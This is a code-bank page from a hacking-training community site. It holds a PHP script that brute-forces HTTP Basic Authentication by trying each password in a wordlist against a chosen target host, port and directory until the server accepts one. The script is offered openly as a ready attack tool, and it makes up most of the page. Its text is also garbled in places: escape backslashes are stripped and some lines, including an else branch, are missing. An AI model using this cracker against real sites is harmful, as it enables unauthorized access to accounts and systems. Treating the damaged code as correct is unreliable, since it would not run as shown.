EG Information

Main Index
EG Manual
Disclaimer
Legal Information
Hall of Fame
Hall of Shame
Member Rankings
Members List
Meet the Staff

Training Missions

Read Me First New
Basic Skills
Realistic Scenarios
Cryptography
Software Cracking
Linux ELF Binary Cracking
Logical Thinking
Programming
Patching
Steganography
Deface This Wall
/dev/null
/dev/urandom

Knowledge Bank

Discussion Forums
Enigma Chat New
RSS Feeds RSS
Articles / Tutorials
Videos
Online EG MP3 Player Radio
Enigma Zine
Downloads
Tools New

Code Resources

Submit Code
Ajax
ASM
Bash
C
CPP
Csharp
Delphi
Haskell
Java
Javascript
Jython
Lisp
mIRC
MySQL
Perl
PHP
Python
QBASIC
VisualBasic

Hakipedia: An open collaborative for all your information security needs.

The Urinal

Click Here To Vote For EG!

Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site.

enigma group

enigma group

enigma group

enigma group

Enigma Group's Code Bank


Basic auth password craker (sockets)

By: mofm  -  Date Submitted: 2009-05-31 07:02:08

  1. <?php 
  2.  
  3. /*
  4.  
  5.  * Mofms password cracker used to crack basic auth passwords
  6.  * Enjoy Edit distribute as you please ... but its polite to leave my name in it. :). 
  7.  
  8.  * Mofm
  9.  
  10.  * usage: crack.php <password file> <username> <pasue per attempt> <interval> <target> <port>
  11.  
  12. */
  13.  
  14.  
  15.  
  16. function sendrequest($site,$password,$username,$socket,$dir)
  17.  
  18. {
  19.  
  20.  
  21.  
  22. 	$data = "HEAD /$dir HTTP/1.1rn";
  23.  
  24. 	$data .= "Host: $sitern";
  25.  
  26. 	$data .= "Authorization: Basic ".base64_encode("$username:$password")."rnrn";
  27.  
  28. 	$reply = '';
  29.  
  30. 	socket_write($socket, $data, strlen($data));
  31.  
  32. 	$reply = socket_read($socket, 2048);
  33.  
  34.  
  35.  
  36. 	switch(substr($reply,9,3))
  37.  
  38. 	{
  39.  
  40. 	case 401:
  41.  
  42. 	return 0;
  43.  
  45.  
  46. 	case 200:
  47.  
  48. 	return 1;
  49.  
  51.  
  52. 	default;
  53.  
  54. 	}	
  55.  
  56. }
  57.  
  58.  
  59.  
  60. function close($socket)
  61.  
  62. {
  63.  
  64. 	socket_close($socket);
  65.  
  66.  
  67.  
  68. }
  69.  
  70. $file =$argv[1];
  71.  
  72. $uname=$argv[2];
  73.  
  74. $sleep=$argv[3];
  75.  
  76. $interval=$argv[4];
  77.  
  78. $site=$argv[5];
  79.  
  80. $port=$argv[6];
  81.  
  82. $dir=$argv[7];
  83.  
  84. $fpfile= @fopen($file, 'r');
  85.  
  86. $inttest=0;
  87.  
  88. $counter=0;
  89.  
  90. if ($fpfile)
  91.  
  92. {
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100. 	while(!feof($fpfile))
  101.  
  102. 	{
  103.  
  104. 		$address = gethostbyname($site);
  105.  
  106. 		$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  107.  
  108. 		$result = socket_connect($socket, $address, $port);
  109.  
  110. 		$pass=trim(fgets($fpfile)); //password from file
  111.  
  112. 		if ($result==0)
  113.  
  114. 		{
  115.  
  116. 			exit("Connection Error/n/r");
  117.  
  118. 		}
  119.  
  120. 		if (sendrequest($site,$pass,$uname,$socket,$dir)==1) //see if we loged in
  121.  
  122. 		{
  123.  
  124. 			echo "!!Password Found!!nr"; //display password
  125.  
  126. 			echo "[$counter]$passnr";
  127.  
  128. 			close($socket);
  129.  
  130. 			exit();
  131.  
  132. 		}
  133.  
  134. 		if ($inttest == $interval)
  135.  
  136. 		{
  137.  
  138. 		echo "Trying[$counter]:$uname:$passn";
  139.  
  140. 		$inttest=0;
  141.  
  142. 		}
  143.  
  144. 		sleep($sleep); //time bettween attacks	
  145.  
  146. 		$inttest++;
  147.  
  148. 		$counter++;
  149.  
  150. 		close($socket);
  151.  
  152.  
  153.  
  154. 	}
  155.  
  156.  
  157.  
  158. 	echo "Password was not in wordlist sorry n";
  159.  
  160. 	close($socket);
  161.  
  162. 	exit();
  163.  
  165.  
  166. {
  167.  
  168. echo "Error opening password file:$file.n";
  169.  
  170. exit();
  171.  
  172. }
  173.  
  174. ?>
  175.  
  176.  
Comments [808]
Return to php category list

Who's Online

483 Guests, 101 Users
ckryptix, Ios, viper0i0, Diznablo, rabbidmind, asapong, Nasrudin, CollapsingWalls, mehtaparag, bitstrike, jnony, C, Nicid1, Nusquam-Redono-Sapientia, bazcrown, saifulfaizan, The End, Ultraminor, psychomarine, st3alth, themastersinner, pgmrlink, login, lionaneesh, ishkur88, mahraja, Mac, chekifr, gandalf88, Vap0r, t0ast, tantrum6226, BnE, Distorted, Psiber_Syn, Ausome1, invas10n, oldgoat, freedaysbecumei, BinaryShinigami, Rex_Mundi, Red_beard, Strobeflux, s0m3nak3dguy, Descent, teehee, machupicchu, Genetix, Anandarl, NotMyOwn, thegamerdude, Godzila, popo12341234, RedEvolution, velocity_b, myne17, teto111, aVoid, Central-Gsm, 1101, JackalReborn, InjectioN, h4lted, c0re, DisPater, markt4death, splatta, Jackowacko, saint556, Pyron2312, Azerion, howsens, white.hat.gone.bad, vazzilly, pwunkz, Inverted, QuarterCask, Infernoe11, deskata, cr4ck3rj4ck, Blizer, jasonmax, j0sh, gwenwavor, N4g4c3N, spizeyboy, Network X, Uino59, Jae Cee, ianFDK, saykov, medhaavee, zofy, demonkiller410, Stumble, SaMTHG, kishore, Raze, helasraizam, Venom1019, Jakabo